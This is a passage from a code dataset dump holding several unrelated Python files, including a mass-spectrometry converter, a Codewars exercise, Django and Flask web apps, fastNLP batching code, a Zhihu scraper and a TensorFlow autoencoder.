mq_msms is None or mrcluster_clusters is None or mzml_file is None:\n        print_help()\n\n    # Read the input spectra\n    exp = MSExperiment()\n    MzMLFile().load(mzml_file, exp)\n    sl = SpectrumLookup()\n    # SpectrumLookup extracts scan numbers via a regexp whose named group must be called SCAN\n    sl.readSpectra(exp, \"=(?<SCAN>\\\\d+)$\")\n\n    count = sum(map(lambda spec: spec.getMSLevel() == 2, exp))\n    print(\"Number of Spectra: \" + str(count))\n\n    # Read the msms.txt file. For now, the peptides will be a dictionary where the key is the scan number\n    # and the value is the peptide sequence. 
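A hypothetical entry, for illustration only: peptides[2958] == \"ELVISLIVESK\". 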
We need to be aware that we can have cases when one scan can be associated with more\n # than one peptide sequence\n\n peptides = read_peptides(mq_msms)\n print('Number of Peptides: ' + str(len(peptides)))\n\n # Read clusters, the clusters will be a map where the key is the scan and the value is the cluster where the scan belongs\n clusters = read_clusters(mrcluster_clusters)\n print(\"Number of Clusters: \" + str(len(clusters)))\n\n new_exp = MSExperiment(exp)\n new_exp.clear(False)\n for scan in clusters:\n print('scan: ' + str(scan))\n index = sl.findByScanNumber(scan)\n spectra = MSSpectrum(exp[index])\n cluster_accession = clusters[scan]\n if scan in peptides:\n peptide_sequence = peptides[scan]\n spectra.setMetaValue(\"Peptide sequence\", peptide_sequence.encode(\"UTF-8\"))\n spectra.setMetaValue(\"Cluster accession\", cluster_accession.encode(\"UTF-8\"))\n\n new_exp.addSpectrum(spectra)\n\n MzMLFile().store(output, new_exp)\n\n@click.group(context_settings=CONTEXT_SETTINGS)\ndef cli():\n \"\"\"This is the main tool that give access to all commands and options provided by the pypgatk\"\"\"\n\n\ncli.add_command(convert_mq_mracluster_mgf)\ncli.add_command(convert_mq_mracluster_mzml)\n\nif __name__ == \"__main__\":\n cli()\n\n# \n# https://www.ebi.ac.uk/ols/ontologies/ms/terms?iri=http%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FMS_1000889\n\n# \n# \n","sub_path":"src/convert_mgf_cluster.py","file_name":"convert_mgf_cluster.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75113707","text":"# https://www.codewars.com/kata/fruit-machine/train/python\n\ndef fruit(reels, spins):\n fruit_array = []\n checked_array = []\n s0 = spins[0]\n s1 = spins[1]\n s2 = spins[2]\n\n r0 = reels[0] \n r1 = reels[1] \n r2 = reels[2] \n\n fruit_array.append(r0[s0])\n fruit_array.append(r1[s1])\n fruit_array.append(r2[s2])\n freq = {x:fruit_array.count(x) for x in fruit_array}\n print(freq)\n\n for key, item in freq.items():\n if 'Wild' in freq and freq['Wild'] == 1:\n if key == 'Star' and item == 2:\n return 18\n elif key == 'Bell' and item == 2:\n return 16\n elif key == 'Shell' and item == 2:\n return 14\n elif key == 'Seven' and item == 2:\n return 12\n elif key == 'Cherry' and item == 2:\n return 10\n elif key == 'Bar' and item == 2:\n return 8\n if key == 'King' and item == 2:\n return 6\n elif key == 'Queen' and item == 2:\n return 4\n elif key == 'Jack' and item == 2:\n return 2\n else:\n if item == 3:\n if key == 'Wild':\n return 100\n elif key == 'Star':\n return 90\n elif key == 'Bell':\n return 80\n elif key == 'Shell':\n return 70\n elif key == 'Seven':\n return 60\n elif key == 'Cherry':\n return 50\n elif key == 'Bar':\n return 40\n elif key == 'King':\n return 30\n elif key == 'Queen':\n return 20\n elif key == 'Jack':\n return 10\n elif item == 2:\n if key == 'Wild':\n return 10\n elif key == 'Star':\n return 9\n elif key == 'Bell':\n return 8\n elif key == 'Shell':\n return 7\n elif key == 'Seven':\n return 6\n elif key == 'Cherry':\n return 5\n elif key == 'Bar':\n return 4\n elif key == 'King':\n return 3\n elif key == 'Queen':\n return 2\n elif key == 'Jack':\n return 1\n else: \n return 0\n break\n\n # for item in fruit_array:\n # if freq[\"King\"] == 2 and freq[\"Wild\"] == 1:\n # break\n # print(6)\n # elif freq[\"King\"] == 2:\n # break\n # print(3)\n\n # if fruit_array.count()\n # print(fruit_array.count()))\n\n# reel1 = [\"King\", \"Jack\", \"Wild\", \"Bell\", \"Star\", \"Seven\", \"Queen\", 
\"Cherry\", \"Shell\", \"Bar\"]\n# reel2 = [\"Star\", \"Bar\", \"Jack\", \"Seven\", \"Queen\", \"Wild\", \"King\", \"Bell\", \"Cherry\", \"Shell\"]\n# reel3 = [\"King\", \"Bell\", \"Jack\", \"Shell\", \"Star\", \"Cherry\", \"Queen\", \"Bar\", \"Wild\", \"Seven\"]\n# spin = [0,5,0]\n# fruit([reel1,reel2,reel3],spin)\n\n# reel1 = ['King', 'Jack', 'Queen', 'Wild', 'Shell', 'Bar', 'Cherry', 'Seven', 'Bell', 'Star']\n# reel2 = ['Bar', 'Seven', 'Cherry', 'Wild', 'Star', 'King', 'Bell', 'Jack', 'Queen', 'Shell']\n# reel3 = ['Bar', 'Cherry', 'Bell', 'Star', 'Queen', 'Seven', 'Shell', 'Wild', 'King', 'Jack']\n# spin = [9,2,5]\n# fruit([reel1,reel2,reel3],spin)\n\nreel1 = ['Queen', 'Seven', 'Star', 'Wild', 'Bar', 'Bell', 'Jack', 'Shell', 'King', 'Cherry']\nreel2 = ['King', 'Jack', 'Bell', 'Cherry', 'Wild', 'Bar', 'Star', 'Queen', 'Shell', 'Seven']\nreel3 = ['Shell', 'Seven', 'Cherry', 'Queen', 'Jack', 'Star', 'King', 'Bar', 'Bell', 'Wild']\nspin = [7, 6, 5]\nfruit([reel1,reel2,reel3],spin)\n\n# my_list.sort()\n# for i in range (len (my_list) -1):\n# \tif my_list[i] == my_list[i+1]:\n# \tprint (my_list[i])","sub_path":"python/toy-problems/fruit_machine.py","file_name":"fruit_machine.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"335487657","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns=[\n url('^$',views.index,name='index'),\n\n url(r'^profile/',views.profile,name='profile'),\n url(r'^edit/profile$',views.edit_profile,name='edit-profile'),\n # url(r'^update/profile/(?P\\w{0,50})',views.update_profile,name='update-profile'),\n url(r'^update/profile/(\\d+)',views.update_profile,name='update-profile'),\n url(r'^new/comment$',views.new_comment,name='comment'),\n url(r'^comments$',views.comments,name='comments'),\n\n url(r'^update/neighborhood$',views.update_neighborhood,name='update-neighborhood'),\n url(r'^post/',views.post,name='post'),\n url(r'^business/',views.business,name='business'),\n url(r'^contacts/',views.contacts,name='contacts'),\n url(r'^neighbourhood/(\\d+)',views.neighbourhood,name='neighbourhood'),\n\n\n\n url(r'^businessdetails/(\\d+)',views.businessdetails,name ='businessdetails'),\n\n url(r'^search/', views.search_results, name='search_results'),\n url(r'^neighborhood/(\\d+)',views.neighborhood,name='neighborhood'),\n]\nif settings.DEBUG:\n urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n","sub_path":"hood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200497048","text":"\"\"\"\nQuestion 11:\nYou will be given the elements\n of A set with N elements and B set\n with M elements (2 <= N, M <= 100).\n Write the program that finds the\n elements of the A⋃B set. In the first\n line of the entry, the number N will\n be given, followed by the elements\n of the A set. In the second line,\n first the number M, then the elements\n of the set B will be given. When \n printing the result on the output,\n you must print the elements in the\n order they appear in set A.\n Intersections are guaranteed\n not to be empty sets. 
Set elements\n will only consist of alphabet letters\n and numbers.\n\"\"\"\n\ndef find_union(set1,set2):\n conjunction=\"\"\n for i in set1:\n if i not in conjunction:\n conjunction += str(i)\n for x in set2:\n if x not in conjunction:\n conjunction += str(x)\n return conjunction\nprint(find_union(\"abcde1234\", \"cdefg6789\"))","sub_path":"for loops and lists/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"326179128","text":"\"\"\"\nbatch 模块实现了 fastNLP 所需的 :class:`~fastNLP.core.batch.DataSetIter` 类。\n\n\"\"\"\n__all__ = [\n \"BatchIter\",\n \"DataSetIter\",\n \"TorchLoaderIter\",\n]\n\nimport atexit\nimport abc\n\nfrom numbers import Number\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom collections import defaultdict\n\nfrom .dataset import DataSet\nfrom .sampler import SequentialSampler\nfrom .field import _get_ele_type_and_dim\nfrom ._logger import logger\n\n\n_python_is_exit = False\n\n\ndef _set_python_is_exit():\n global _python_is_exit\n _python_is_exit = True\n\n\natexit.register(_set_python_is_exit)\n\n\ndef may_to_tensor(data, as_numpy, fn):\n if not as_numpy:\n dtype, dim = _get_ele_type_and_dim(data)\n try:\n data, flag = _to_tensor(data, dtype)\n except TypeError as e:\n logger.error(f\"Field {fn} cannot be converted to torch.tensor.\")\n raise e\n return data\n\n\ndef convert_tensor(batch_dict, as_numpy):\n for n, v in batch_dict.items():\n batch_dict[n] = may_to_tensor(v, as_numpy, n)\n\nclass DataSetGetter:\n \"\"\"\n 传递给torch.utils.data.DataLoader获取数据,DataLoder会传入int的idx获取数据(调用这里的__getitem__()函数)。\n \"\"\"\n def __init__(self, dataset: DataSet, as_numpy=False):\n self.dataset = dataset\n self.as_numpy = as_numpy\n self.idx_list = list(range(len(dataset)))\n\n self.x_names = {n for n, f in dataset.get_all_fields().items() if f.is_input}\n self.y_names = {n for n, f in dataset.get_all_fields().items() if f.is_target}\n\n def __getitem__(self, idx: int):\n # mapping idx to sampled idx\n idx = self.idx_list[idx]\n ins = self.dataset[idx]\n return idx, ins\n\n def __len__(self):\n return len(self.dataset)\n\n def collate_fn(self, ins_list: list):\n \"\"\"\n\n :param batch: [[idx1, x_dict1, y_dict1], [idx2, x_dict2, y_dict2], [xx, xx, xx]]\n :return:\n \"\"\"\n indices = []\n sin_x, sin_y = defaultdict(list), defaultdict(list)\n for idx, ins in ins_list:\n indices.append(idx)\n for n, v in ins.items():\n if n in self.x_names:\n sin_x[n].append(v)\n if n in self.y_names:\n sin_y[n].append(v)\n\n def pad(batch_dict):\n result = {}\n for n, vlist in batch_dict.items():\n f = self.dataset.field_arrays[n]\n if f.padder is None:\n result[n] = np.array(vlist)\n else:\n result[n] = f.pad(vlist)\n return result\n\n sin_x = pad(sin_x)\n sin_y = pad(sin_y)\n convert_tensor(sin_x, self.as_numpy)\n convert_tensor(sin_y, self.as_numpy)\n\n if not self.dataset.collector.is_empty():\n bx, by = self.dataset._collect_batch(ins_list)\n sin_x.update(bx)\n sin_y.update(by)\n\n return (indices, sin_x, sin_y)\n\n def __getattr__(self, item):\n if hasattr(self.dataset, item):\n return getattr(self.dataset, item)\n else:\n raise AttributeError(\"'DataSetGetter' object has no attribute '{}'\".format(item))\n\n\nclass SamplerAdapter(torch.utils.data.Sampler):\n \"\"\"\n 用于传入torch.utils.data.DataLoader中,DataLoader会调用__iter__()方法获取index(一次只取一个int)\n\n \"\"\"\n def __init__(self, sampler, dataset):\n super().__init__(dataset)\n self.sampler = sampler\n self.dataset = 
dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __iter__(self):\n return iter(self.sampler(self.dataset))\n\n\nclass BatchIter:\n \"\"\"\n Trainer用于迭代数据的类。继承该类,并实现get_num_batches(), get_batch_indices(), dataset(), num_batches(),\n __iter__()方法。\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n if not isinstance(sampler, torch.utils.data.Sampler):\n self.sampler = SamplerAdapter(sampler=sampler or SequentialSampler(), dataset=dataset)\n else:\n self.sampler = sampler\n\n # DataLoader的collect_fn输入是List[],里面的元素是dataset[index]返回的结果\n if collate_fn is None:\n # pytoch <= 1.1 中不能设置collate_fn=None\n self.dataiter = torch.utils.data.DataLoader(\n dataset=dataset, batch_size=batch_size, sampler=self.sampler,\n num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last,\n timeout=timeout, worker_init_fn=worker_init_fn)\n else:\n self.dataiter = torch.utils.data.DataLoader(\n dataset=dataset, batch_size=batch_size, sampler=self.sampler,\n collate_fn=collate_fn, num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last,\n timeout=timeout, worker_init_fn=worker_init_fn)\n\n # 以sampler的数量为准,因为DistributedSampler的时候每个进程上并不是所有的数据都用上了\n self._num_batches = self.get_num_batches(len(self.dataiter.sampler), batch_size, drop_last)\n self.batch_size = batch_size\n self.cur_batch_indices = None\n\n @property\n def num_batches(self):\n return self._num_batches\n\n @num_batches.setter\n def num_batches(self, value):\n self._num_batches = value\n\n def init_iter(self):\n pass\n\n @staticmethod\n def get_num_batches(num_samples, batch_size, drop_last):\n \"\"\"\n 计算batch的数量。用于前端显示进度\n\n :param int num_samples:\n :param int batch_size:\n :param bool drop_last: 如果最后一个batch没有batch_size这么多,是否就丢掉。\n :return:\n \"\"\"\n num_batches = num_samples // batch_size\n if not drop_last and (num_samples % batch_size > 0):\n num_batches += 1\n return num_batches\n\n def get_batch_indices(self):\n \"\"\"\n 获取最近输出的batch的index。用于溯源当前batch的数据\n\n :return:\n \"\"\"\n return self.cur_batch_indices\n\n def __len__(self):\n return self.num_batches\n\n @property\n def dataset(self):\n \"\"\"\n 获取正在参与iterate的dataset\n\n :return:\n \"\"\"\n return self.dataiter.dataset\n\n @abc.abstractmethod\n def __iter__(self):\n \"\"\"\n 用于实际数据循环的类,返回值需要为两个dict, 第一个dict中的内容会认为是input, 第二个dict中的内容会认为是target\n\n :return:\n \"\"\"\n raise NotImplemented\n\n\nclass DataSetIter(BatchIter):\n \"\"\"\n DataSetIter 用于从 `DataSet` 中按一定的顺序, 依次按 ``batch_size`` 的大小将数据取出,\n 组成 `x` 和 `y`::\n\n batch = DataSetIter(data_set, batch_size=16, sampler=SequentialSampler())\n num_batch = len(batch)\n for batch_x, batch_y in batch:\n # do stuff ...\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None, as_numpy=False,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n \"\"\"\n \n :param dataset: :class:`~fastNLP.DataSet` 对象, 数据集\n :param int batch_size: 取出的batch大小\n :param sampler: 规定使用的 :class:`~fastNLP.Sampler` 方式. 若为 ``None`` , 使用 :class:`~fastNLP.SequentialSampler`.\n \n Default: ``None``\n :param bool as_numpy: 若为 ``True`` , 输出batch为 numpy.array. 
否则为 :class:`torch.Tensor`.\n\n Default: ``False``\n :param int num_workers: 使用多少个进程来预处理数据\n :param bool pin_memory: 是否将产生的tensor使用pin memory, 可能会加快速度。\n :param bool drop_last: 如果最后一个batch没有batch_size这么多sample,就扔掉最后一个\n :param timeout: 生成一个batch的timeout值\n :param worker_init_fn: 在每个worker启动时调用该函数,会传入一个值,该值是worker的index。\n :param collate_fn: 用于将样本组合成batch的函数\n \"\"\"\n assert isinstance(dataset, DataSet)\n dataset = DataSetGetter(dataset, as_numpy)\n collate_fn = dataset.collate_fn if collate_fn is None else collate_fn\n super().__init__(\n dataset=dataset, batch_size=batch_size, sampler=sampler,\n num_workers=num_workers, pin_memory=pin_memory,\n drop_last=drop_last, timeout=timeout, worker_init_fn=worker_init_fn,\n collate_fn=collate_fn\n )\n\n def __iter__(self):\n self.init_iter()\n for indices, batch_x, batch_y in self.dataiter:\n self.cur_batch_indices = indices\n yield batch_x, batch_y\n\n\nclass TorchLoaderIter(BatchIter):\n \"\"\"\n 与DataSetIter类似,但用于pytorch的DataSet对象。\n 通过使用TorchLoaderIter封装pytorch的DataSet,然后将其传入到Trainer中。\n\n \"\"\"\n def __init__(self, dataset, batch_size=1, sampler=None,\n num_workers=0, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, collate_fn=None):\n \"\"\"\n\n :param dataset: :class:`~fastNLP.DataSet` 对象, 数据集\n :param int batch_size: 取出的batch大小\n :param sampler: 规定使用的 :class:`~fastNLP.Sampler` 方式. 若为 ``None`` , 使用 :class:`~fastNLP.SequentialSampler`.\n\n Default: ``None``\n :param int num_workers: 使用多少个进程来预处理数据\n :param bool pin_memory: 是否将产生的tensor使用pin memory, 可能会加快速度。\n :param bool drop_last: 如果最后一个batch没有batch_size这么多sample,就扔掉最后一个\n :param timeout: 生成一个batch的timeout值\n :param worker_init_fn: 在每个worker启动时调用该函数,会传入一个值,该值是worker的index。\n :param collate_fn: 用于将样本组合成batch的函数\"\"\"\n assert len(dataset) > 0\n ins = dataset[0]\n assert len(ins) == 2 and \\\n isinstance(ins[0], dict) and \\\n isinstance(ins[1], dict), 'DataSet should return two dict, as X and Y'\n\n super().__init__(\n dataset=dataset, batch_size=batch_size, sampler=sampler,\n num_workers=num_workers, pin_memory=pin_memory,\n drop_last=drop_last, timeout=timeout, worker_init_fn=worker_init_fn,\n collate_fn=collate_fn\n )\n\n def __iter__(self):\n self.init_iter()\n for batch_x, batch_y in self.dataiter:\n self.cur_batch_indices = None\n yield batch_x, batch_y\n\n\ndef _to_tensor(batch, field_dtype):\n \"\"\"\n\n :param batch: np.array()\n :param field_dtype: 数据类型\n :return: batch, flag. 
如果传入的数据支持转为tensor,返回的batch就是tensor,且flag为True;如果传入的数据不支持转为tensor,\n 返回的batch就是原来的数据,且flag为False\n \"\"\"\n try:\n if field_dtype is not None and isinstance(field_dtype, type)\\\n and issubclass(field_dtype, Number) \\\n and not isinstance(batch, torch.Tensor):\n new_batch = torch.as_tensor(batch)\n flag = True\n else:\n new_batch = batch\n flag = False\n if torch.is_tensor(new_batch):\n if 'float' in new_batch.dtype.__repr__():\n new_batch = new_batch.float()\n elif 'int' in new_batch.dtype.__repr__():\n new_batch = new_batch.long()\n return new_batch, flag\n except Exception as e:\n raise e\n","sub_path":"fastNLP/core/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50370886","text":"import json\nimport time\nfrom flask import Flask, g\nfrom flask import jsonify, request\nfrom flask_restful import reqparse, Api, Resource\n# from flask_httpauth import HTTPTokenAuth\n\nfrom function import user_modeling, recommendation, system_critiquing\nfrom tool import time_helper\nimport pprint\nimport copy\n\n\npp = pprint.PrettyPrinter(indent=4)\n\n# Flask declaration\napp = Flask(__name__)\napi = Api(app)\n \n# considered_attributes\ncategorical_attributes = ['artist','genre']\nnumerical_attributes = ['popularity', 'danceability', 'energy', 'speechiness', 'tempo', 'valence']\n# numerical_attributes = ['popularity', 'danceability', 'energy', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence']\n\n\n# 操作(post / get)资源列表\nclass InitializeUserModel(Resource):\n def get(self):\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Initialize User Model\")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_historical_record = user_profile['user']['preferenceData']['track']\n # initialize the user preference model\n user_initial_preference_value = user_modeling.initialize_user_preference_value(user_historical_record, categorical_attributes, numerical_attributes)\n user_preference_attribute_frequency = user_modeling.initialize_user_preference_attribute_frequency( categorical_attributes, numerical_attributes)\n user_profile['user']['user_preference_model'] = {'preference_value':user_initial_preference_value, 'attribute_frequency':user_preference_attribute_frequency}\n # initialize the user constraints (empty)\n user_constraint = {}\n user_profile['user']['user_constraints'] = user_constraint\n # # initialize the user critique preference (empty)\n user_critique_preference = {}\n user_profile['user']['user_critique_preference'] = user_critique_preference\n\n # pp.pprint(user_initial_preference_value)\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Initialize User Model ---- run time : %ss ' % str(end-start))\n\n return user_profile\n\nclass UpdateUserModel(Resource):\n \n def get(self):\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Update User Model \")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_interaction_dialog = user_profile['logger']['latest_dialog']\n user_listened_longs = user_profile['logger']['listenedSongs']\n user_model = user_profile['user']\n # update the user model (three parts)\n updated_user_preference_model, updated_user_constraints, updated_user_critique_preference = user_modeling.update_user_model(user_model, \\\n user_interaction_dialog, user_listened_longs, 
categorical_attributes, numerical_attributes)\n user_profile['user']['user_preference_model'] = updated_user_preference_model\n user_profile['user']['user_constraints'] = updated_user_constraints\n user_profile['user']['user_critique_preference'] = updated_user_critique_preference\n \n # update the user interaction log \n for log in user_interaction_dialog:\n user_profile['logger']['dialog'].append(copy.deepcopy(log))\n \n user_profile['logger']['latest_dialog'] = []\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Update User Model ---- run time : %ss ' % str(end-start))\n\n # pp.pprint(user_profile)\n # 资源添加成功,返回201\n return user_profile\n \nclass GetRec(Resource):\n \n def get(self):\n\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Get Recommendation\")\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_preference_model = user_profile['user']['user_preference_model'] \n user_critique_preference = user_profile['user']['user_critique_preference'] \n item_pool = user_profile['vis']\n top_K = 10\n method = 'MAUT_COMPAT' # (1) MAUT (2) COMPAT (3) MAUT_COMPAT\n alpha = 0.5\n recommendations = recommendation.compute_recommendation(user_preference_model, user_critique_preference, item_pool, top_K, categorical_attributes, numerical_attributes, method, alpha)\n recommendation_list = {'recommendation_list': recommendations}\n \n end = time.process_time()\n time_helper.print_current_time()\n print ('Get Recommendation ---- run time : %ss ' % str(end-start))\n\n\n return recommendation_list, 201\n\nclass GetSysCri(Resource):\n \n def get(self):\n\n start = time.process_time()\n time_helper.print_current_time()\n print(\"Get System Critiques\")\n\n\n json_data = request.get_json(force=True)\n user_profile = json_data['user_profile']\n user_preference_model = user_profile['user']['user_preference_model'] \n user_critique_preference = user_profile['user']['user_critique_preference'] \n\n user_interaction_log = user_profile['logger']\n item_pool = user_profile['vis']\n cur_rec = user_profile['topRecommendedSong']\n top_K = 10\n unit_or_compound = [1]\n \n method = 'MAUT_COMPAT'\n alpha = 0.5\n estimated_score_dict = recommendation.compute_recommendation(user_preference_model, user_critique_preference, item_pool, top_K, categorical_attributes, numerical_attributes, method, alpha, sort=False)\n \n sys_crit_version = 'diversity_oriented' # preference_oriented / diversity_oriented / personality_adjusted\n sys_crit = None\n if sys_crit_version == 'preference_oriented':\n sys_crit = system_critiquing.generate_system_critiques_preference_oriented(user_preference_model, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n if sys_crit_version == 'diversity_oriented':\n sys_crit = system_critiquing.generate_system_critiques_diversity_oriented(user_preference_model, user_interaction_log, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n if sys_crit_version == 'personality_adjusted':\n sys_crit = system_critiquing.generate_system_critiques_personality_adjusted(user_preference_model, user_interaction_log, estimated_score_dict, item_pool, cur_rec, top_K, unit_or_compound, categorical_attributes, numerical_attributes)\n\n # pp.pprint(sys_crit)\n sys_crit_with_rec_list = {'sys_crit': sys_crit}\n\n end = time.process_time()\n time_helper.print_current_time()\n print ('Get System Critiques ---- run 
time : %ss ' % str(end-start))\n\n\n\n return sys_crit_with_rec_list, 201\n\n\n# 设置路由,即路由地址为http://127.0.0.1:5000/xxx\napi.add_resource(InitializeUserModel, \"/initialize_user_model\") \napi.add_resource(UpdateUserModel, \"/update_user_model\") \napi.add_resource(GetRec, \"/get_rec\")\napi.add_resource(GetSysCri, \"/get_sys_cri\")\n \nif __name__ == \"__main__\":\n server = '127.0.0.1'\n port = '5000'\n app.run(debug=True, host= server, port=port)\n","sub_path":"backend/musicbot_py_api.py","file_name":"musicbot_py_api.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"401277513","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import relationship\n\nfrom database.database import Base\n\n\nclass Region(Base):\n __tablename__ = 'regions'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False, unique=True)\n # countries = relationship('Country', back_populates='region')\n\n def __init__(self, name):\n self.name = name\n\n def __repr__(self):\n return f'Region [ID: {self.id}, Name: {self.name}, countries: {self.countries}'\n","sub_path":"model/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"600934183","text":"\nimport requests\nimport time\nimport json\nfrom lxml import etree\n\ndef get_user_content(url):\n ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'\n header = {'user-agent':ua}\n response = requests.get(url,headers = header)\n selector = etree.HTML(response.text)\n content_dict = {}\n for i in range(1,16):\n content = selector.xpath(f\"//div[@class='List-item'][{i}]/div/div[2]/div/span/p/text()\")\n content_dict[f'{i}'] = content\n content_str = json.dumps(content_dict,ensure_ascii=False)\n with open('content.json','w',encoding='utf-8') as f: \n f.write(content_str)\n\nif __name__ == '__main__':\n url = 'https://www.zhihu.com/question/433415189'\n get_user_content(url)\n\n\n","sub_path":"week02/work02/zhihu_requests.py","file_name":"zhihu_requests.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277205492","text":"from django.shortcuts import render, redirect\nfrom .models import Class, Class_Description, Academy, Profile_preference, Request, Recommendation, RecommendationRequest\nfrom .rcmd import getRecommendation, filtering\nfrom .getcsv import saveinfo\nfrom .forms import RequestForm, RecommendationRequestForm\n\ndef home(request) :\n # Information about class_description stored in DB \n saveinfo()\n return render(request, 'home.html')\n\ndef request(request) :\n\n # pass form and save request to db\n if request.method == \"POST\":\n form = RequestForm(request.POST)\n if form.is_valid():\n rq = form.save(commit=False)\n rq.save()\n else:\n form = RequestForm()\n return render(request, 'request.html', {'form' : form})\n\ndef recommendation(request) :\n\n rq = Request.objects.last()\n \n # Handing over the list of student preferences in order\n p = Profile_preference.objects.all()\n p_list = []\n p_list.insert(0, p[0].classSize)\n p_list.insert(1, p[0].tuition)\n p_list.insert(2, p[0].teacherCareer)\n p_list.insert(3, p[0].ageDistribition)\n\n # Return the recommended class id list by referring to filtered data and student 
preferences\n class_list = getRecommendation(filtering(rq.level), p_list)\n\n # Find class list with class id and save result to Recommendation\n for cid in class_list :\n c = Class.objects.filter(class_id = cid)\n r = Recommendation(recommendation_id = cid, classList = c[0].name)\n\n # Do not save duplicate values.\n dup = Recommendation.objects.filter(recommendation_id = cid)\n if(dup) : \n continue\n else :\n r.save()\n\n # pass all recommendation objects under the name rcmd_class to the html file.\n rcmd_class = Recommendation.objects.all()\n \n # pass form and save request to db\n if request.method == \"POST\":\n form = RecommendationRequestForm(request.POST)\n if form.is_valid():\n rq = form.save(commit=False)\n rq.save()\n else:\n form = RecommendationRequestForm()\n\n return render(request, 'recommendation.html', {'rcmd_class' : rcmd_class, 'form': form})\n \n\ndef result(request) :\n rq = RecommendationRequest.objects.last()\n\n # Find class with class name\n my_class = Class.objects.filter(name = rq.selected_class)\n lk = my_class[0].like\n\n # Find class description with class name\n class_dscp = Class_Description.objects.filter(subject = rq.selected_class)\n\n # Find academy information with class name\n my_aca = Academy.objects.filter(name = my_class[0].academy_name)\n \n # Student can check his interest\n if request.method == \"POST\" : \n my_class.update(like = lk+1)\n return redirect('result')\n else :\n return render(request, 'request.html',{'my_class' : my_class , 'class_dscp' : class_dscp , 'my_aca' : my_aca})\n","sub_path":"MAXIM/maxim/recommendation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262739564","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\n\r\n# Set random seed for reproducibility\r\nnp.random.seed(1000)\r\ntf.random.set_seed(1000)\r\n\r\n\r\nnb_samples = 1000\r\nnb_epochs = 400\r\nbatch_size = 200\r\ncode_length = 256\r\n\r\n\r\nclass DAC(tf.keras.Model):\r\n def __init__(self):\r\n super(DAC, self).__init__()\r\n\r\n # Encoder layers\r\n self.c1 = tf.keras.layers.Conv2D(\r\n filters=32,\r\n kernel_size=(3, 3),\r\n strides=(2, 2),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.c2 = tf.keras.layers.Conv2D(\r\n filters=64,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.c3 = tf.keras.layers.Conv2D(\r\n filters=128,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.flatten = tf.keras.layers.Flatten()\r\n\r\n self.dense = tf.keras.layers.Dense(\r\n units=code_length,\r\n activation=tf.keras.activations.sigmoid)\r\n\r\n # Decoder layers\r\n self.dc0 = tf.keras.layers.Conv2DTranspose(\r\n filters=128,\r\n kernel_size=(3, 3),\r\n strides=(2, 2),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc1 = tf.keras.layers.Conv2DTranspose(\r\n filters=64,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc2 = tf.keras.layers.Conv2DTranspose(\r\n filters=32,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.relu,\r\n padding='same')\r\n\r\n self.dc3 = tf.keras.layers.Conv2DTranspose(\r\n filters=1,\r\n kernel_size=(3, 3),\r\n activation=tf.keras.activations.sigmoid,\r\n 